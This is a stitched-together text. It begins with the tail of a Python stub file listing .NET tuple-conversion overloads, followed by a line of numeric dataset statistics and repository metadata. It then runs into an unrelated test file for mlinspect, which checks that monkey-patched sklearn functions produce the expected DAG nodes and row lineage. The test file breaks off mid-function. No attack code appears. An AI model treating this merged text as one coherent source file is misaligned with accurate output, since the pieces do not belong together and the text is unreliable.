Deconstruct[(T1,T2,T3,T4)](value: Tuple[T1,T2,T3,T4]) -> (T1,T2,T3,T4)
Deconstruct[(T1,T2,T3,T4,T5)](value: Tuple[T1,T2,T3,T4,T5]) -> (T1,T2,T3,T4,T5)
Deconstruct[(T1,T2,T3)](value: Tuple[T1,T2,T3]) -> (T1,T2,T3)
Deconstruct[T1](value: Tuple[T1]) -> T1
Deconstruct[(T1,T2)](value: Tuple[T1,T2]) -> (T1,T2)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8]]) -> (T1,T2,T3,T4,T5,T6,T7,T8)
Deconstruct[(T1,T2,T3,T4,T5,T6)](value: Tuple[T1,T2,T3,T4,T5,T6]) -> (T1,T2,T3,T4,T5,T6)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7)](value: Tuple[T1,T2,T3,T4,T5,T6,T7]) -> (T1,T2,T3,T4,T5,T6,T7)
"""
pass
@staticmethod
def ToTuple(value):
"""
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15]]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15]]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16]]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16]]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19,T20)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16,T17,T18,T19,T20]]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18,T19,T20]]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19,T20,T21)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16,T17,T18,T19,T20,T21]]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18,T19,T20,T21]]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16,T17,T18,T19]]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18,T19]]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16,T17]]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17]]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16,T17,T18]]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18]]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11]]
ToTuple[(T1,T2,T3,T4)](value: ValueTuple[T1,T2,T3,T4]) -> Tuple[T1,T2,T3,T4]
ToTuple[(T1,T2,T3,T4,T5)](value: ValueTuple[T1,T2,T3,T4,T5]) -> Tuple[T1,T2,T3,T4,T5]
ToTuple[(T1,T2,T3)](value: ValueTuple[T1,T2,T3]) -> Tuple[T1,T2,T3]
ToTuple[T1](value: ValueTuple[T1]) -> Tuple[T1]
ToTuple[(T1,T2)](value: ValueTuple[T1,T2]) -> Tuple[T1,T2]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10]]
ToTuple[(T1,T2,T3,T4,T5,T6,T7,T8)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8]]) -> Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8]]
ToTuple[(T1,T2,T3,T4,T5,T6)](value: ValueTuple[T1,T2,T3,T4,T5,T6]) -> Tuple[T1,T2,T3,T4,T5,T6]
ToTuple[(T1,T2,T3,T4,T5,T6,T7)](value: ValueTuple[T1,T2,T3,T4,T5,T6,T7]) -> Tuple[T1,T2,T3,T4,T5,T6,T7]
"""
pass
@staticmethod
def ToValueTuple(value):
"""
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15]]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15]]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16]]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16]]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19,T20)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18,T19,T20]]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16,T17,T18,T19,T20]]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19,T20,T21)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18,T19,T20,T21]]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16,T17,T18,T19,T20,T21]]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18,T19]]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16,T17,T18,T19]]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17]]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16,T17]]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18]]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11,T12,T13,T14,ValueTuple[T15,T16,T17,T18]]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10,T11]]
ToValueTuple[(T1,T2,T3,T4)](value: Tuple[T1,T2,T3,T4]) -> ValueTuple[T1,T2,T3,T4]
ToValueTuple[(T1,T2,T3,T4,T5)](value: Tuple[T1,T2,T3,T4,T5]) -> ValueTuple[T1,T2,T3,T4,T5]
ToValueTuple[(T1,T2,T3)](value: Tuple[T1,T2,T3]) -> ValueTuple[T1,T2,T3]
ToValueTuple[T1](value: Tuple[T1]) -> ValueTuple[T1]
ToValueTuple[(T1,T2)](value: Tuple[T1,T2]) -> ValueTuple[T1,T2]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8,T9,T10]]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7,T8)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8]]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7,ValueTuple[T8]]
ToValueTuple[(T1,T2,T3,T4,T5,T6)](value: Tuple[T1,T2,T3,T4,T5,T6]) -> ValueTuple[T1,T2,T3,T4,T5,T6]
ToValueTuple[(T1,T2,T3,T4,T5,T6,T7)](value: Tuple[T1,T2,T3,T4,T5,T6,T7]) -> ValueTuple[T1,T2,T3,T4,T5,T6,T7]
"""
pass
__all__ = [
"Deconstruct",
"ToTuple",
"ToValueTuple",
]
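
# Illustrative only (an assumption about how these stubs map to .NET; actual
# call sites depend on the runtime): from IronPython, the underlying
# System.TupleExtensions static class could be used along these lines:
#
#   import clr
#   from System import Tuple, TupleExtensions
#   pair = Tuple.Create(1, "a")                 # System.Tuple[int, str]
#   vpair = TupleExtensions.ToValueTuple(pair)  # System.ValueTuple[int, str]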
| 67.44186 | 311 | 0.658793 | 2,480 | 11,600 | 3.079839 | 0.023387 | 0.094266 | 0.134328 | 0.169678 | 0.924588 | 0.911495 | 0.89238 | 0.878502 | 0.857031 | 0.844855 | 0 | 0.264449 | 0.082672 | 11,600 | 171 | 312 | 67.836257 | 0.453341 | 0.905603 | 0 | 0.157895 | 0 | 0 | 0.038961 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078947 | false | 0.078947 | 0 | 0 | 0.131579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 11 |
41c69829afa35346409197c00992bfb2043f2647 | 70,913 | py | Python | test/monkeypatching/test_patch_sklearn.py | tum-db/mlinspect4sql | 863f1a98baff92341722b4fb180008cf9b518b80 | [
"Apache-2.0"
] | null | null | null | test/monkeypatching/test_patch_sklearn.py | tum-db/mlinspect4sql | 863f1a98baff92341722b4fb180008cf9b518b80 | [
"Apache-2.0"
] | null | null | null | test/monkeypatching/test_patch_sklearn.py | tum-db/mlinspect4sql | 863f1a98baff92341722b4fb180008cf9b518b80 | [
"Apache-2.0"
] | null | null | null | """
Tests whether the monkey patching works for all patched sklearn methods
"""
# pylint: disable=too-many-lines
from inspect import cleandoc
import networkx
import numpy
import pandas
from pandas import DataFrame
from testfixtures import compare
from mlinspect import OperatorType, OperatorContext, FunctionInfo
from mlinspect.instrumentation import _pipeline_executor
from mlinspect.instrumentation._dag_node import DagNode, CodeReference, BasicCodeLocation, DagNodeDetails, \
OptionalCodeInfo
from mlinspect.inspections._lineage import RowLineage, LineageId
def test_label_binarize():
"""
Tests whether the monkey patching of ('sklearn.preprocessing._label', 'label_binarize') works
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import label_binarize
import numpy as np
pd_series = pd.Series(['yes', 'no', 'no', 'yes'], name='A')
binarized = label_binarize(pd_series, classes=['no', 'yes'])
expected = np.array([[1], [0], [0], [1]])
assert np.array_equal(binarized, expected)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 5),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.series', 'Series')),
DagNodeDetails(None, ['A']),
OptionalCodeInfo(CodeReference(5, 12, 5, 59),
"pd.Series(['yes', 'no', 'no', 'yes'], name='A')"))
expected_binarize = DagNode(1,
BasicCodeLocation("<string-source>", 6),
OperatorContext(OperatorType.PROJECTION_MODIFY,
FunctionInfo('sklearn.preprocessing._label', 'label_binarize')),
DagNodeDetails("label_binarize, classes: ['no', 'yes']", ['array']),
OptionalCodeInfo(CodeReference(6, 12, 6, 60),
"label_binarize(pd_series, classes=['no', 'yes'])"))
expected_dag.add_edge(expected_data_source, expected_binarize)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_binarize]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([1]), {LineageId(0, 0)}],
[numpy.array([0]), {LineageId(0, 1)}],
[numpy.array([0]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
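
# The remaining tests follow the same three-step pattern as above: run the
# pipeline with a RowLineage inspection via _pipeline_executor, compare the
# extracted DAG against a hand-built networkx.DiGraph, then check the
# captured per-row lineage for the nodes of interest.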
def test_train_test_split():
"""
Tests whether the monkey patching of ('sklearn.model_selection._split', 'train_test_split') works
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.model_selection import train_test_split
pandas_df = pd.DataFrame({'A': [1, 2, 10, 5]})
train_data, test_data = train_test_split(pandas_df, random_state=0)
expected_train = pd.DataFrame({'A': [5, 2, 1]})
expected_test = pd.DataFrame({'A': [10]})
pd.testing.assert_frame_equal(train_data.reset_index(drop=True), expected_train.reset_index(drop=True))
pd.testing.assert_frame_equal(test_data.reset_index(drop=True), expected_test.reset_index(drop=True))
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
inspector_result.dag.remove_node(list(inspector_result.dag.nodes)[4])
inspector_result.dag.remove_node(list(inspector_result.dag.nodes)[3])
expected_dag = networkx.DiGraph()
expected_source = DagNode(0,
BasicCodeLocation("<string-source>", 4),
OperatorContext(OperatorType.DATA_SOURCE, FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A']),
OptionalCodeInfo(CodeReference(4, 12, 4, 46), "pd.DataFrame({'A': [1, 2, 10, 5]})"))
expected_train = DagNode(1,
BasicCodeLocation("<string-source>", 5),
OperatorContext(OperatorType.TRAIN_TEST_SPLIT,
FunctionInfo('sklearn.model_selection._split', 'train_test_split')),
DagNodeDetails('(Train Data)', ['A']),
OptionalCodeInfo(CodeReference(5, 24, 5, 67),
'train_test_split(pandas_df, random_state=0)'))
expected_dag.add_edge(expected_source, expected_train)
expected_test = DagNode(2,
BasicCodeLocation("<string-source>", 5),
OperatorContext(OperatorType.TRAIN_TEST_SPLIT,
FunctionInfo('sklearn.model_selection._split', 'train_test_split')),
DagNodeDetails('(Test Data)', ['A']),
OptionalCodeInfo(CodeReference(5, 24, 5, 67),
'train_test_split(pandas_df, random_state=0)'))
expected_dag.add_edge(expected_source, expected_test)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_train]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[5, {LineageId(0, 3)}],
[2, {LineageId(0, 1)}],
[1, {LineageId(0, 0)}]],
columns=['A', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_test]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[10, {LineageId(0, 2)}]], columns=['A', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
def test_standard_scaler():
"""
Tests whether the monkey patching of ('sklearn.preprocessing._data', 'StandardScaler') works
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import StandardScaler
import numpy as np
df = pd.DataFrame({'A': [1, 2, 10, 5]})
standard_scaler = StandardScaler()
encoded_data = standard_scaler.fit_transform(df)
expected = np.array([[-1.], [-0.71428571], [1.57142857], [0.14285714]])
assert np.allclose(encoded_data, expected)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 5),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A']),
OptionalCodeInfo(CodeReference(5, 5, 5, 39), "pd.DataFrame({'A': [1, 2, 10, 5]})"))
expected_transformer = DagNode(1,
BasicCodeLocation("<string-source>", 6),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._data', 'StandardScaler')),
DagNodeDetails('Standard Scaler', ['array']),
OptionalCodeInfo(CodeReference(6, 18, 6, 34), 'StandardScaler()'))
expected_dag.add_edge(expected_data_source, expected_transformer)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_transformer]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([-1.0]), {LineageId(0, 0)}],
[numpy.array([-0.7142857142857143]), {LineageId(0, 1)}],
[numpy.array([1.5714285714285714]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
def test_kbins_discretizer():
"""
Tests whether the monkey patching of ('sklearn.preprocessing._discretization', 'KBinsDiscretizer') works
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import KBinsDiscretizer
import numpy as np
df = pd.DataFrame({'A': [1, 2, 10, 5]})
discretizer = KBinsDiscretizer(n_bins=3, encode='ordinal', strategy='uniform')
encoded_data = discretizer.fit_transform(df)
expected = np.array([[0.], [0.], [2.], [1.]])
assert np.allclose(encoded_data, expected)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 5),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A']),
OptionalCodeInfo(CodeReference(5, 5, 5, 39), "pd.DataFrame({'A': [1, 2, 10, 5]})"))
expected_transformer = DagNode(1,
BasicCodeLocation("<string-source>", 6),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._discretization',
'KBinsDiscretizer')),
DagNodeDetails('K-Bins Discretizer', ['array']),
OptionalCodeInfo(CodeReference(6, 14, 6, 78),
"KBinsDiscretizer(n_bins=3, encode='ordinal', strategy='uniform')"))
expected_dag.add_edge(expected_data_source, expected_transformer)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_transformer]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([0.]), {LineageId(0, 0)}],
[numpy.array([0.]), {LineageId(0, 1)}],
[numpy.array([2.]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
def test_simple_imputer():
"""
    Tests whether the monkey patching of ('sklearn.impute._base', 'SimpleImputer') works
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.impute import SimpleImputer
import numpy as np
df = pd.DataFrame({'A': ['cat_a', np.nan, 'cat_a', 'cat_c']})
imputer = SimpleImputer(missing_values=np.nan, strategy='most_frequent')
imputed_data = imputer.fit_transform(df)
expected = np.array([['cat_a'], ['cat_a'], ['cat_a'], ['cat_c']])
assert np.array_equal(imputed_data, expected)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 5),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A']),
OptionalCodeInfo(CodeReference(5, 5, 5, 61),
"pd.DataFrame({'A': ['cat_a', np.nan, 'cat_a', 'cat_c']})"))
expected_transformer = DagNode(1,
BasicCodeLocation("<string-source>", 6),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.impute._base', 'SimpleImputer')),
DagNodeDetails('Simple Imputer', ['A']),
OptionalCodeInfo(CodeReference(6, 10, 6, 72),
"SimpleImputer(missing_values=np.nan, strategy='most_frequent')"))
expected_dag.add_edge(expected_data_source, expected_transformer)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_transformer]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array(['cat_a']), {LineageId(0, 0)}],
[numpy.array(['cat_a']), {LineageId(0, 1)}],
[numpy.array(['cat_a']), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
def test_one_hot_encoder_not_sparse():
"""
    Tests whether the monkey patching of ('sklearn.preprocessing._encoders', 'OneHotEncoder') works with dense output
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import label_binarize, OneHotEncoder
import numpy as np
df = pd.DataFrame({'A': ['cat_a', 'cat_b', 'cat_a', 'cat_c']})
one_hot_encoder = OneHotEncoder(sparse=False)
encoded_data = one_hot_encoder.fit_transform(df)
expected = np.array([[1., 0., 0.], [0., 1., 0.], [1., 0., 0.], [0., 0., 1.]])
print(encoded_data)
assert np.allclose(encoded_data, expected)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 5),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A']),
OptionalCodeInfo(CodeReference(5, 5, 5, 62),
"pd.DataFrame({'A': ['cat_a', 'cat_b', 'cat_a', 'cat_c']})"))
expected_transformer = DagNode(1,
BasicCodeLocation("<string-source>", 6),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._encoders', 'OneHotEncoder')),
DagNodeDetails('One-Hot Encoder', ['array']),
OptionalCodeInfo(CodeReference(6, 18, 6, 45), 'OneHotEncoder(sparse=False)'))
expected_dag.add_edge(expected_data_source, expected_transformer)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_transformer]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([1.0, 0.0, 0.0]), {LineageId(0, 0)}],
[numpy.array([0.0, 1.0, 0.0]), {LineageId(0, 1)}],
[numpy.array([1.0, 0.0, 0.0]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
def test_one_hot_encoder_sparse():
"""
Tests whether the monkey patching of ('sklearn.preprocessing._encoders', 'OneHotEncoder') works for sparse output
"""
test_code = cleandoc("""
import pandas as pd
from sklearn.preprocessing import label_binarize, OneHotEncoder
from scipy.sparse import csr_matrix
import numpy
df = pd.DataFrame({'A': ['cat_a', 'cat_b', 'cat_a', 'cat_c']})
one_hot_encoder = OneHotEncoder()
encoded_data = one_hot_encoder.fit_transform(df)
expected = csr_matrix([[1., 0., 0.], [0., 1., 0.], [1., 0., 0.], [0., 0., 1.]])
assert numpy.allclose(encoded_data.A, expected.A) and isinstance(encoded_data, csr_matrix)
""")
inspector_result = _pipeline_executor.singleton.run(python_code=test_code, track_code_references=True,
inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 6),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A']),
OptionalCodeInfo(CodeReference(6, 5, 6, 62),
"pd.DataFrame({'A': ['cat_a', 'cat_b', 'cat_a', 'cat_c']})"))
expected_transformer = DagNode(1,
BasicCodeLocation("<string-source>", 7),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._encoders', 'OneHotEncoder')),
DagNodeDetails('One-Hot Encoder', ['array']),
OptionalCodeInfo(CodeReference(7, 18, 7, 33), 'OneHotEncoder()'))
expected_dag.add_edge(expected_data_source, expected_transformer)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_transformer]
lineage_output = inspection_results_data_source[RowLineage(3)]
